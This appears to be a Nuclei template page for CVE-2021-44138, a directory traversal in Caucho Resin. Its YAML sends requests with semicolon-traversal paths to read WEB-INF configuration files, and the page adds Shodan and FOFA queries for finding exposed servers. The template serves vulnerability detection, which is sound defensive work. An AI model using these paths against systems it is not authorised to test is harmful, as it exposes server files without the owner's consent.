Skip to content
Nuclei Templates

Caucho Resin >=4.0.52 <=4.0.56 - Directory traversal

ID: CVE-2021-44138

Severity: high

Author: carrot2

Tags: cve2021,cve,resin,caucho,lfi

Description

Section titled “Description”

There is a Directory traversal vulnerability in Caucho Resin, as distributed in Resin 4.0.52 - 4.0.56, which allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request.

YAML Source

Section titled “YAML Source”
id: CVE-2021-44138


info:
  name: Caucho Resin >=4.0.52 <=4.0.56 - Directory traversal
  author: carrot2
  severity: high
  description: |
    There is a Directory traversal vulnerability in Caucho Resin, as distributed in Resin 4.0.52 - 4.0.56, which allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive data exposure.
  remediation: |
    Upgrade Caucho Resin to a version higher than 4.0.56 to mitigate the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/cve-2021-44138
    - https://github.com/maybe-why-not/reponame/issues/2
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-44138
    cwe-id: CWE-22
    epss-score: 0.01258
    epss-percentile: 0.8528
    cpe: cpe:2.3:a:caucho:resin:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 2
    vendor: caucho
    product: resin
    shodan-query:
      - html:"Resin"
      - http.html:"resin"
      - cpe:"cpe:2.3:a:caucho:resin"
    fofa-query: body="resin"
  tags: cve2021,cve,resin,caucho,lfi


http:
  - method: GET
    path:
      - "{{BaseURL}}/;/WEB-INF/web.xml"
      - "{{BaseURL}}/resin-doc/;/WEB-INF/resin-web.xml"


    stop-at-first-match: true


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<web-app"
          - "</web-app>"
        condition: and


      - type: word
        part: header
        words:
          - "text/xml"
          - "application/xml"
        condition: or


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d6d00827cb344d3efeefe9c2f49c8f89e298c8651d0cc195ccab6a3ce9bb8dae0220622ad31c420af51b9da6ceeac178f7f158248ff953048bcb01cd0f9e6d14009c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-44138.yaml"

View on Github